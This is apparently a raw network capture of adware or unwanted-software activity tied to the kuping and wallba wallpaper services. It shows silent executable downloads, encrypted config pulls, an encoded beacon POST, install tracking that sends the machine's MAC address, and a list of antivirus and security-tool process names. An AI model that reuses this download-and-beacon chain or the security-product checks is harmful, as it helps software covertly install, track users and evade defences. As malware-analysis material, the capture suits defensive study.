User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 09 Jun 2014 21:41:49 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- a padding to disable
MSIE and Chrome friendly error page -->..<!-- a padding to disa
ble MSIE and Chrome friendly error page -->..<!-- a padding to d
isable MSIE and Chrome friendly error page -->..<!-- a padding t
o disable MSIE and Chrome friendly error page -->..<!-- a paddin
g to disable MSIE and Chrome friendly error page -->..<!-- a pad
ding to disable MSIE and Chrome friendly error page -->....
GET /Public/conf/media/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:47 GMT
Content-Type: text/xml
Content-Length: 880
Last-Modified: Mon, 09 Jun 2014 10:08:26 GMT
Connection: keep-alive
ETag: "5395879a-370"
Accept-Ranges: bytes..._..O.K......&.......y.....{.".......g.........<..w .L`D.7......{
....Q...lRc.,8....o..i.f..Zgk.o.Y....=)......j...,.G...D..`.n.....WR..
...sfA$;&.E...p.......... ..:c......,......S__.mT0]k............d>.
ui5c.JX.`....i.....h@;.b.x.A.F9:._(.7.|.5....d>.ui5c..[....V.B_..w.
..{.,...F?...I@..\.....U..)..w.x.S>.bNm...i.pMn.%....-.....?..3...'
h......<Tj.1....>$.S.....C..HZ...n..pg.~......i..(..E.8.n.....*.
...S. p.DkI..0.8...c ...G.1........z./.Y.E.o7.n.p.....U.G&..k.^..{C.8.
.9...Lk{..D\N..=|.e.y5.;Z...v..^..>.-"Iyl..\C|q.4o.tV.....I.....4o.
tV........,l.qa..@:.tx.... ......<0.YW`xNMB.W.x....^0*.5q....p&....
T.%....yC.G1 ....=8..O.=c..U .....89.?:..MVC.I....T.S..X....(...y^.B_.
.w...5.. .f..0.^N......Q.g....f71.....bdn-...rO......2N.^.E.k....qw...
..u..C.....X.....?.........=.........U......i.....<."..]$ap ].r....
..."J.z~e?.D..e.......H...i.e(...... ..IuM.L.J.k...#.y..~m.(.A.}.....
GET /Public/Configs/Liveindex.html?id=53390 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: config.wallba.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:38:04 GMT
Content-Type: text/html
Content-Length: 312
Last-Modified: Wed, 12 Dec 2012 06:57:03 GMT
Connection: keep-alive
ETag: "50c82abf-138"
Accept-Ranges: bytes<!DOCTYPE html>.<html>.<head>. <title>tj<
;/title>. </head>. <body>. <div style="
display: none;">. <script src="hXXp://s21.cnzz.co
m/stat.php?id=4833416&web_id=4833416" language="JavaScript"></sc
ript>. </div>. </bod
y>. </html>...
GET /Public/Configs/Functon_version.xml HTTP/1.1
Host: config.wallba.com
Accept:
Referer: hXXp://VVV.wallba.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 206 Partial Content
Server: nginx
Date: Mon, 09 Jun 2014 21:38:03 GMT
Content-Type: text/xml
Content-Length: 270
Last-Modified: Mon, 01 Apr 2013 07:10:23 GMT
Connection: keep-alive
ETag: "515932df-10e"
Content-Range: bytes 0-269/270<?xml version="1.0" encoding="utf-8"?><think><homeVersi
on>162</homeVersion><AppVersion>3</AppVersion><
;AppSoftVersion>3</AppSoftVersion><SearchBuffVersion>61
</SearchBuffVersion><SkinVersion>3</SkinVersion><
AlbumVersion>9</AlbumVersion><LiveVersion>1</LiveVer
sion></think>..
GET /Public/Configs/KpLiveControl/53390.xml HTTP/1.1
Host: config.wallba.com
Accept:
Referer: hXXp://VVV.wallba.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 09 Jun 2014 21:38:04 GMT
Content-Type: text/html
Content-Length: 1
Connection: keep-alive
ETag: "5088e841-1"...
GET /app.gif?&cna=CRgdDIoZnicCAbhrJiboztvu HTTP/1.1
Accept: */*
Referer: hXXp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 09 Jun 2014 21:41:29 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=CRgdDIoZnicCAbhrJiboztvu; expires=Thu, 06-Jun-24 21:41:29 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cacheGIF89a.............!.......,...........L..;..
GET /1.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:29 GMT
Content-Type: text/xml
Content-Length: 2415
Last-Modified: Thu, 05 Jun 2014 09:33:56 GMT
Connection: keep-alive
ETag: "53903984-96f"
Accept-Ranges: bytes<?xml version="1.0" encoding="utf-8"?>.<body>..<soft><<>>
;..<soft_id>2</soft_id>..<softdata>3430,360.........
...,360Tray.exe|3427,............,SGWallPaper.exe|3428,.........HD,Lov
eWallpaper4.exe|3417,......QQ,QQ.exe|3418,QQ......,QQMusic.exe|3422,36
0......,360sd.exe|3421,360......,360wpsrv.exe|3423,............,BaiduS
dSvc.exe|3424,............,BaiduAn.exe|3425,............,KSafeTray.exe
|3426,............,QQPCRTP.exe|3429,............,KanKan.exe|3432,.....
.,kxetray.exe|</softdata>.</soft>.<soft>..<soft_i
d>9</soft_id>..<softdata>3441,............,SGWallPaper.
exe|3442,.........HD,LoveWallpaper4.exe|3433,......QQ,QQ.exe|3434,QQ..
....,QQMusic.exe|3436,360......,360sd.exe|3435,360......,360wpsrv.exe|
3437,............,BaiduSdSvc.exe|3438,............,BaiduAn.exe|3439,..
..........,KSafeTray.exe|3440,............,QQPCRTP.exe|3444,360.......
.....,360Tray.exe|3443,............,KanKan.exe|3446,......,kxetray.exe
|3447,360............,360Desktop.exe|3448,............,Clsmn.exe|3449,
.....................,PBSClient.exe|3450,......,DF5Serv.exe|3451,.....
.,BarMonitor.exe|3452,.........,lock.exe|3458,............,BarClientVi
ew.exe|3459,iKeeper,update.exe|3460,............,.............exe|3465
,......,DbntCli.exe|</softdata>.</soft>.<soft>..<
soft_id>1</soft_id>..<softdata>3453,.........,lock.exe|
3454,......,BarMonitor.exe|3455,......,DF5Serv.exe|3456,..............
.......,PBSClient.exe|3457,............,Clsmn.exe|3461,iKeeper,upd
POST /behavior/ HTTP/1.1
Host: tj.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length:393
data=0nU/YbYz5K7D+woXHKKqAUxAjrZ5pBHQD917ZhicnCutsUTQ99RwRdETIDB+GlPpvxmu2ErU51oYcro7L69SGB5M8cAYjydVwjzBM4P9UAZwpvFKyIZIhDqP5c4p1bGiaDlq0lFNYoFi4Uqe1Jo92GOlNI/23NmsBA9lvEMwjO4Xw9UwDBS+AhGjNX55IFqo04DmX/oFHpEGMgFf2yci8YML5GI8asczsFztfUGiSVL4CT8Ibx3Xx5LxJPzKtBXeHzPKcN3uYFLYrLJXkl1o+GLjN1Fytnd01LFtNZNp/s5M0JD2LRpkILONhW3EviB4KmOqPIm0VpI=&sgin=a0cbe508a68688a05df6e1b4dd7063d1
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:40:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive2..ok..0..
GET /Public/Upload/Soft/kptoolbar_b_8.exe HTTP/1.1
Host: img.kuping.cc
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.0 200 OK
Server: nginx
Date: Fri, 30 May 2014 13:38:40 GMT
Content-Type: application/octet-stream
Content-Length: 3052176
Last-Modified: Fri, 30 May 2014 05:15:29 GMT
Accept-Ranges: bytes
X-Cache: HIT from xnop014-CT-JSNT-29-239.fastcdn.com
F-In-Cache: father-in-cache
Age: 65096
X-Cache: HIT from CT-ZJWZ-163-83.fastcdn.com
Connection: keep-aliveMZ......................@...................................(.........<<>>
..!..L.!This program cannot be run in DOS mode....$........d]TJ.3.J.3.
J.3.1.?.N.3..'8.I.3..&*.H.3... .@.3.J.3.M.3.(. .\.3...=.N.3.%.8.I.3.%.
9.A.3.%.7.N.3.|#8.M.3.|#7.I.3.J.2.K.3...8.h.3...5.K.3.RichJ.3.........
................PE..L......S..................... ......H.............
@..................................g/.................................
........,.......P3...........t........................................
.......................................................text...........
.................... ..`.rdata...i.......p..................@..@.data.
..Xq... ...p... ..............@....rsrc...P3.......@..................
@..@..................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
GET /hmt/icon/21.gif HTTP/1.1
Accept: */*
Referer: hXXp://config.153624.com/Public/tongji_baidu.html?ip=&mac=00-0C-29-64-A0-20&area=&channel_id=53390&install_way=1&soft_id=1&start_way=0&type=install&version=4.3.2.2
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: eiv.baidu.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
ETag: "762990053"
Accept-Ranges: bytes
Last-Modified: Tue, 13 Apr 2010 09:38:40 GMT
Expires: Wed, 17 Apr 2024 21:41:26 GMT
Cache-Control: max-age=311040000
Content-Length: 1119
Date: Mon, 09 Jun 2014 21:41:26 GMT
Server: BWS/1.0
Connection: Keep-AliveGIF89a........s..E.....M...................ZS.2-.YS.......2,.c[..D....<<>>
...0'..:..0.&..]Z..8..>..D.TM.................C................._..
^.....u..w........~........k.4......X..d.......=1.....a.c[.PH.h_.....b
..........PH........A..9....h`..J..1.......g`..W........2........z.#..
.p..m....jd........*.............[Q...........6..G..............6..t..
........... ..TL.....!....$....."..;0.....h.7-..............Z.........
....%..:.....H@....^W.QJ..'. !..........70.._. %.'...T.0'..Q.G?.ws....
-$........h.}w.....>...........L.....#.......:0.............\S.....
........*".....Q..............<..T.!...p.$...}........N..........d_
...........j.......VN.....o.....e........[............................
......................................................................
....................!.......,............u...,..>6.T.T..&T.".H. ...
.3^.PQ.G..:^..H.-.T....2#!........K..iP.&..03%X..x.P/^.$...`...G>Xd
....!..d.T...j.,..fQ..8l<..U%..G|.h.......$p..f......R..b.....*R@W"
2y..8..V3.LV`t.e..7.>.........\D..O.H.....$...^.]..).. ...9..E...d\
...V.U1..i......B]......c.P<0.i...v.]D..G .?p-.CD.Fi;>..v....r`.
.&........./.dp....`.....;HTTP/1.1 200 OK..Content-Type: image/gif..ET
ag: "762990053"..Accept-Ranges: bytes..Last-Modified: Tue, 13 Apr 2010
09:38:40 GMT..Expires: Wed, 17 Apr 2024 21:41:26 GMT..Cache-Control:
max-age=311040000..Content-Length: 1119..Date: Mon, 09 Jun 2014 21:41:
26 GMT..Server: BWS/1.0..Connection: Keep-Alive..
GET /Public/conf/icon/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:49 GMT
Content-Type: text/xml
Content-Length: 1880
Last-Modified: Mon, 09 Jun 2014 12:48:31 GMT
Connection: keep-alive
ETag: "5395ad1f-758"
Accept-Ranges: bytes..._..O.K......&.......y.....{.".......g.........<..w .L.v...i]..mL<<>>
8<.l .b.gv.F..M..h..~6..>N.N.............X.....e.....q.....'.;&.
E...p.9.. .~.T.j.w...Vz..._.S.....9.O.....:Q...*..Cph...Y\v.7I.z.C ...
.....C.fJ.%.l?V?{~(~.$.Q...%H.8Bh..;Mu.?{~(~.$.Q...%H.8'}b-l.-..p9.z.[
....#....4..Y.e.V..9{..#........d:.X....kt..@T....=.3...EX.../....i.pM
n.%....-.....j....|...S.......n.g%).(.E.(.}.|p{...Q h...-..@..~...wI!.
n..!..n..r....o$........g...{.<....p>..SS.t...lA.F.si...U..8.`8.
........(. .;.In .;B....wP....u."....]....:.v.[..!0N.]....:.v?...I@...
~..{...va...Z..h.h.J*P.>......A.O....Q..5..dF8;..v..R.W.Vtd?~..x..t
..>..f..;.i.f..;..!)......~.w/"..FV..;.......@*.u.~._....P.q..q..!.
..7...... Wm.o`N.....7.D.3.q....J.t.aY.ji..oP.[Fl...K....Y.E.o7.,.e..
.L....?............I..q.....Y.O.....M.AM[|0..D..5...Y.O....2...H..L.\.
.....E..jb...2....a....<A.:b..,.s>1=m........F.h...b.}.Q.I.fg$Nj
m\...*. . Q.3.O..T.r..y....Q&(s0@&f....; .....I......G..-T.B.>.@..`
1.....X.G.......#.ar...V<..Y.. ..Gk~h6..)Q... $....A.Pe1W.^Q..S....
B.c-....K.....TG..-T.B.>.@..`1.....X.G."....g...Y.o..........]...q.
.SX...C.?...e.n...2$..C.?...ym......)..A...!N...\8.....&k.....Y.....p.
..w.b.K........[..*...I..6..X.........(SkF$^X.a`.;ICG.......,..$}?V_*d
'.X..$..M.!...#..P ...HA..!..T..6.pVTG.3..lK:~.'.....z./S.Ia..[..H.1&W
.....k..l.7........8....a.7........m .!L,....F...........<.=...k.sG
1 ....=.9....k=.4.J.AV.S...W....N..?.2..x....^0..Q...[.T.S..X....&....
..U .....89.?:..M.5.. .f...Sg ....m..l1.....nE...@...n!>......'
GET /download.php/kuping_b_53390.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: d.union.kuping.cc
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:37:29 GMT
Content-Type: application/octet-stream
Content-Length: 5072400
Last-Modified: Mon, 12 May 2014 02:03:05 GMT
Connection: keep-alive
ETag: "53702bd9-4d6610"
Accept-Ranges: bytesMZ......................@.............................................<<>>
..!..L.!This program cannot be run in DOS mode....$........d[TJ.5.J.5.
J.5.1.9.N.5..'>.I.5..&,.H.5...&.@.5.J.5.M.5.(.&.\.5...;.N.5.%.>.
I.5.%.?.A.5.%.1.N.5.|#>.M.5.|#1.I.5.J.4.H.5...>.h.5...3.K.5.Rich
J.5.........PE..L.....TS..................... ....................@...
..............................B1N.....................................
....,.......P3...........KM.x.........................................
...................................................text...............
................ ..`.rdata..,i.......p..................@..@.data...Pq
... ...p... ..............@....rsrc...P3.......@..................@..@
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
GET /ImagesCache/335x335min/data/Image/2013hjw/3yue/7hao/chbz/19/20133795822390.jpg HTTP/1.1
Host: img.wallba.com
Accept:
Referer: hXXp://VVV.wallba.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt; DTS Agent;)
Range: bytes=0-
HTTP/1.1 206 Partial Content
Server: nginx
Date: Fri, 09 May 2014 09:13:20 GMT
Content-Type: image/jpeg
Last-Modified: Wed, 13 Mar 2013 03:57:37 GMT
Accept-Ranges: bytes
X-Via: 930-815-21-925-800 Fikker/Webcache/3.5.8, 615-692-941-511-739 Fikker/Webcache/3.5.8
Connection: close
Content-Length: 11142
Content-Range: bytes 0-11141/11142......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62),<<>>
default quality....C................................... $.' ",#..(7),
01444.'9=82<.342...C...........2!.!22222222222222222222222222222222
222222222222222222........O.."........................................
....................}........!1A..Qa."q.2....#B...R..$3br........%&'()
*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................
......................................................................
..........................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.
....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................
.............................................................?..H...OH
.t.....B5...T.. J.b...:...S............ug.......U..S.f...Lts.....GV<
;.p..0.H.?j.c..:.%O1J$.).:.GO....J.)._.[......!H.u..H.P...).N()..m.x.E
.b.J......j...*..FR.2qQ.....H.R...S.U..$R....y..X.5>........*.B'UGD
F..qUdrjW..J.]t.%.......j&SV..C....l'..%.4.[d.....Td...l..-Zbl..U.9..*
.Z.3.2..@.W.j....fm...2.).*..k.n}J@.R.S.*uJ..H.c...u...I.,V...*...%.`.
......6RR..*...BU./4.:.by..*Q.H.S......?j.G.J.....0X.R..c....)....?eH
.N.E.b-.m.......b...N*.Z....h..Q..X .J..s.d..j.V:W!.=.(....5.......R."
'b..Rj..M8E...QZ..w*.\SJ...P..L..Z...d.4.h..W*2.J..[d....3 .Yj..m..e."
..U.".e.Ej.Z.3.UqP...2.v....F..iV.:D^j./...G.(w.LU.JDZ.W.. q.R..OU....
<.{).*P.......(.VvQ..1J%}...>](..ar.,u*.J..R...'....m..R...%....
jm.m...,b.8-8-H...d[(.R...9.b.-B....4...)..VI]..z.r6..M v._a&.*nN.9jI.
...I..Y..*.n .4........).T....i.".-D.V.b.".bh.mF.V...kD.efZ...2.eE
GET /9.gif?abc=1&rnd=913603030 HTTP/1.1
Accept: */*
Referer: hXXp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Mon, 09 Jun 2014 21:41:29 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=CRgdDIoZnicCAbhrJiboztvu; expires=Thu, 06-Jun-24 21:41:29 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=0b695c50; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=061e85a72a58c8a8a07b67a4_1402350089; expires=Thu, 06-Jun-24 21:41:29 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=CRgdDIoZnicCAbhrJiboztvu
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cacheGIF89a.............!.......,...........L..;..
GET /core.php?web_id=4793307&t=z HTTP/1.1
Accept: */*
Referer: hXXp://img.wallba.com/Public/Configs/index.html?id=53390&class=silence
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 09 Jun 2014 21:41:28 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 09 Jun 2014 21:41:28 GMT
Expires: Mon, 09 Jun 2014 21:56:28 GMT31f..!function(){var a,b,c,d=encodeURIComponent,e="4793307",f="",g="",
h="online_v3.php",i="hzs6.cnzz.com",j="1",k="text",l="z",m="站
38271;统计",n=window["_CNZZDbridge_" e].bobject,o="https:"
==document.location.protocol?"https:":"http:",p="0",q=o "//online.cnzz
.com/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g))
,r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cnz
z.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):(
b="z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://quan
jing.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<a
href='" b "' target=_blank title='" m "'><img border=0 hspace=0
vspace=0 src='" c "'></a>"):a="<a href='" b "' target=_bl
ank title='" m "'>" m "</a>",n.createIcon([a])))}();...0..
GET /Public/conf/c-lock/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:30 GMT
Content-Type: text/xml
Content-Length: 1760
Last-Modified: Mon, 09 Jun 2014 02:30:09 GMT
Connection: keep-alive
ETag: "53951c31-6e0"
Accept-Ranges: bytes.h....N..KN ...M..n7.#...!..t[......7....Zh.....].W._..C.S."..V|..#..o<<>>
....R.R:..R...17.[..F..*>......JK...n7.#....)..vW....B....|.p....1J
..S"....].a..:7j[........R.R:..qE.0.J.|.....|.n.0 .%b.......H..~.{....
/......:^.K?.e.........`).r...c.....n4[9!V~....~...X{|y....W?.Cqr.Z...
.......p ..&S!.GB^W=...W...3.z....9:..p..m..Q'G...fBQNgY". ..F...."..v
.i....p. ..C|...|../1.k9..^......5n<.r...zh......0.9...J.y........e
. M.N.....c.....|F.V.f......F...."..v.i....p. ..C|...|../1.k9..^..X.b.
#.......gM.#.....Id...y.&...=...W.....A..(^...P5.:..5..(.<...l.q...
..i....Z...e.p.d...F.d.......{Wa..e.b.2....>.k.hA.Q..0..I.S.K.|...R
E...@...]......U..L.Jv:..n...gU.......^z..Z..... ..m...=...j.....9..0L
=...W...\..N..<.?.. ..o..-. ...[..n7.#......9B........U.r.Zn ...Z0.
Q68....lL(/qS.&..?OY..q....[..].....)....q*.uf ...:....`_..9Q./..C.E.~
....xE.l...L|w......e. .B|..................|.LF/.l6t?t...C.[..N;:CJ8.
_..,...i."0...m{0......b0..Z..76.~.......B...B.5$...%{..>2.I..#.y..
...e. %.....:.X.....x.%.....:..].|....~.{..../.y.g.2.,m.<.0.&!.....
.....f.....Q}. /!..HG..OYq....H...?dJTm...Ut..%..z...W?.Cqr.Rr...O....
.,.6.=g......F/.l6t?t...C.[......"v.0....k.r...R.R:..I...kI....W.C...0
!.V2.#.........M.|&..#?..W?.Cqr...h ..8.......x=...W...!s.......S.bq..
.w..2.9.l.o.a......n7.#...0.....M$Z.U...*.@Ei.I..M.!...#..P ...HA...l.
.s&.B.......<...T.".b......=...W.......4......2.u...D.NV'x[..&h...(
6....Hh[e..%...(..py.E..q0.......3=..n_l..W?.Cqr.H....:.@.Z..Cl...."..
..b....].c...2:^4..(8.6..D..U.0...C..&...n....,..I.....e. ..D ...I
GET /Public/Configs/index.html?id=53390&class=silence HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.wallba.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 07:16:33 GMT
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 02 May 2013 04:18:13 GMT
Content-Length: 493
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: keep-alive
X-Via: 615-692-941-511-739 Fikker/Webcache/3.5.8..........mRQ..0....;..J[.j......J.E.... .k..n.U.gc.i.2..p.....N..e..g
..........*...@....._].].....]......M..........u,3......EZ.3B.....e.'.
'r.ZcKn..~..\s..v.u.c.d.............L..`.#q[....d.E.G.)..X..H..&.=...B
...z7:G@...u".,........?...1O.-e.P.......>%.G<VyBO.Lfb^w.X...T..
m.......(M5..."..d...3}^...!E..l_....G....D..i..^.2..l....j.....p..(..
RK&..a0.;R3...\.25...d....-t.......`.f6....{fU.Z..L(Fs1@=w..~........I
qHc^..........O'.........c^x.......&N.......s7.d;....m..A...z.......`.
...g.......
GET /core.php?web_id=4833416&t=z HTTP/1.1
Accept: */*
Referer: hXXp://config.wallba.com/Public/Configs/Liveindex.html?id=53390
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
Cookie: cna=CRgdDIoZnicCAbhrJiboztvu
HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 09 Jun 2014 21:41:31 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 09 Jun 2014 21:41:31 GMT
Expires: Mon, 09 Jun 2014 21:56:31 GMT320..!function(){var a,b,c,d=encodeURIComponent,e="4833416",f="",g="",
h="online_v3.php",i="hzs21.cnzz.com",j="1",k="text",l="z",m="站&
#38271;统计",n=window["_CNZZDbridge_" e].bobject,o="https:
"==document.location.protocol?"https:":"http:",p="1",q=o "//online.cnz
z.com/online/" h,r=[];r.push("id=" e),r.push("h=" i),r.push("on=" d(g)
),r.push("s=" d(f)),q ="?" r.join("&"),"0"===p&&n.callRequest([o "//cn
zz.mmstat.com/9.gif?abc=1"]),j&&(""!==g?n.createScriptIcon(q,"utf-8"):
(b="z"==l?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" e:"hXXp://qua
njing.cnzz.com","pic"===k?(c=o "//icon.cnzz.com/img/" f ".gif",a="<
a href='" b "' target=_blank title='" m "'><img border=0 hspace=
0 vspace=0 src='" c "'></a>"):a="<a href='" b "' target=_b
lank title='" m "'>" m "</a>",n.createIcon([a])))}();...0..
GET /Public/conf/homepage/1/1_4_3_2_2/53390.xml HTTP/1.1
Host: config.153624.com
Connection: keep-alive
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17 SE 2.X MetaSr 1.0
Accept-Encoding: deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Jun 2014 21:41:48 GMT
Content-Type: text/xml
Content-Length: 1008
Last-Modified: Mon, 09 Jun 2014 10:06:23 GMT
Connection: keep-alive
ETag: "5395871f-3f0"
Accept-Ranges: bytes..._..O.K......&.......y.....{.".......g.........<..w .L\...y... {.
